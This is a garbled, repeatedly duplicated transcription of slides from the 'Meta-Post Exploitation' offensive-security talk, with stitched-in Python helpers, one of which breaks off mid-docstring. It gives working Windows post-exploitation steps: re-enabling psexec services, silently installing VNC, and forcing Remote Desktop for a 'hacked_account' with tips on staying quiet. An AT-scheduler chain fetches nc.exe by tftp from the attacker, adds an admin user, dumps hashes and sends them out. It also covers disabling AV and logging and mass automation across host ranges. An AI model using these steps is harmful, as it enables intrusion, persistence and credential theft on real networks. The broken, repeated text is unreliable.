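    host = cmd[2].lstrip("\\").split("\\")[0]  # '\\\\10.0.0.7\\ipc$' -> '10.0.0.7'
    return CANNED[host]


if __name__ == "__main__":
    results = mass_net_use(expand_targets("192.168.1.0/30, 10.0.0.7"),
                           "user", "pass", canned_runner)
    for host, status in results.items():
        print(f"{host:<16} {status}")
    print("sessions:", [h for h, s in results.items() if s == "ok"])
```

Keeping the outcomes apart is what makes the next stage cheap: the "ok" list feeds the AT jobs, the "bad_credentials" list is what you re-run with the next set of hashes or passwords, and "conflicting_session" tells you an existing session from this machine is already in the way and must be dropped with `net use \\host\ipc$ /delete` first.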

Slide 66

• DEMOS

Slide 67

• Related talks you should see
– Beyond EIP – the theoretical tool-development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
– Thanks to:
  • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
  • HD Moore especially, for support and mentorship
  • Danny Quist, krbklepto, Egypt, spoonm, skape
  • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

Page 43: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 44: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 45: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 46: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly

• Not just through existing tools
– Stealth / Persistence requirements

• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
– PsExec: It's still cool (Thanks Mark)

• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)

• Turning off or adding exceptions to security software
– Firewalls, AV, logging

• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables ClipBook, which psexec requires (l4m3)
– Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe (the space after start= is required by sc)
– net use \\target\ipc$ password /user:username
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)

– Go get VNC (check out guh.nu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:
  • winvnc.exe
  • vnc.reg
  • vnchooks.dll
  • omnithread_rt.dll
– regedit /s vnc.reg
– winvnc -install
– net start "VNC Server"
– winvnc
– Password is "infected"
– The Password value below is WinVNC's 8-byte DES-obfuscated form of the password, encrypted with a fixed key, so anyone who can read this key can recover it

vnc.reg file contents:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
  • Ex: System controlling access to security doors
  – No command-line way of modifying the system, need the GUI
  • SCADA systems
  • Security cameras
  • Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =

– This file will fix the policy settings in your way
– Change "hacked_account" to a real account
– Caveat: each [Privilege Rights] line is the complete assignment, so as written it also strips SeInteractiveLogonRight from Administrators and Users; if you need to stay quiet, list the existing holders alongside your account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands:
  • sc config termservice start= auto
  • regedit /s enable_ts.reg
  • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
  • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
  • secedit /configure /db c:\windows\security\database\new.secedit.sdb /cfg fix_ts_policy.ini
  • gpupdate /force
  • net start "terminal services"
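The procedure above changes two independent things, the Terminal Server registry values and the logon-right assignments, and either can quietly fail to take (a GPO refresh can put fDenyTSConnections back, secedit can reject a malformed template). The following is an added example, not code from the talk or its authors: it parses a `reg export` of the Terminal Server key and a `secedit /export` of the local policy (sample exports constructed inline, modelled on the slide's files) and reports whether a given account can log on over RDP; it also shows how to write the [Privilege Rights] line so it adds your account instead of replacing the existing holders. Group membership is not resolved, so an account that holds the right only through a group has to be checked by the group's name or SID.

```python
r"""
Verify what the Remote Desktop enablement above actually left behind.

Added example, not from the original slides.  Two things decide whether an
RDP logon succeeds on XP/2003 after the secedit/regedit sequence: the Terminal
Server registry values and the logon-right assignments in local policy.  On the
target you would export both and pull the files back:

    reg export "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" ts.reg
    secedit /export /cfg policy.inf

(both exports are UTF-16; decode as such when reading from disk).  The parsers
below work on that text and decide whether a named account can log on over RDP.
merge_privilege_right() also builds a [Privilege Rights] line that appends an
account to the existing holders instead of replacing them.  Assumptions: the
sample exports are constructed; group membership is not resolved, so an account
that holds a right only through a group must be checked by its group's name/SID.
"""
import re

SAMPLE_TS_REG = '''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
'''

# secedit writes well-known principals as *SID (S-1-5-32-544 = Administrators,
# -555 = Remote Desktop Users, -545 = Users); names appear for other accounts.
SAMPLE_POLICY_INF = '''[Unicode]
Unicode=yes
[Privilege Rights]
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555,hacked_account
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-545,hacked_account
SeDenyRemoteInteractiveLogonRight =
SeDenyInteractiveLogonRight = Guest
[Version]
signature="$CHICAGO$"
Revision=1
'''

_DWORD = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})\s*$', re.M)


def parse_reg_dwords(reg_text):
    """Return {value_name: int} for every REG_DWORD line in a .reg export."""
    return {m.group('name'): int(m.group('hex'), 16) for m in _DWORD.finditer(reg_text)}


def parse_privilege_rights(inf_text):
    """Return {right_name_lower: [principal, ...]} from [Privilege Rights].

    The leading '*' on SIDs is stripped so SIDs and names compare uniformly;
    right names are case-insensitive to secedit, so they are lower-cased.
    """
    rights, in_section = {}, False
    for line in inf_text.splitlines():
        line = line.strip()
        if line.startswith('['):
            in_section = line.lower() == '[privilege rights]'
            continue
        if not in_section or '=' not in line:
            continue
        name, _, value = line.partition('=')
        rights[name.strip().lower()] = [p.strip().lstrip('*') for p in value.split(',') if p.strip()]
    return rights


def rdp_logon_allowed(reg_values, rights, principal):
    """Decide whether `principal` (account name or SID) can open an RDP session.

    Checks, in the order the target applies them: fDenyTSConnections must be 0,
    the principal must hold SeRemoteInteractiveLogonRight, and must not appear
    in SeDenyRemoteInteractiveLogonRight.  Returns (allowed, reasons) so a
    failed enablement tells you which step did not take.
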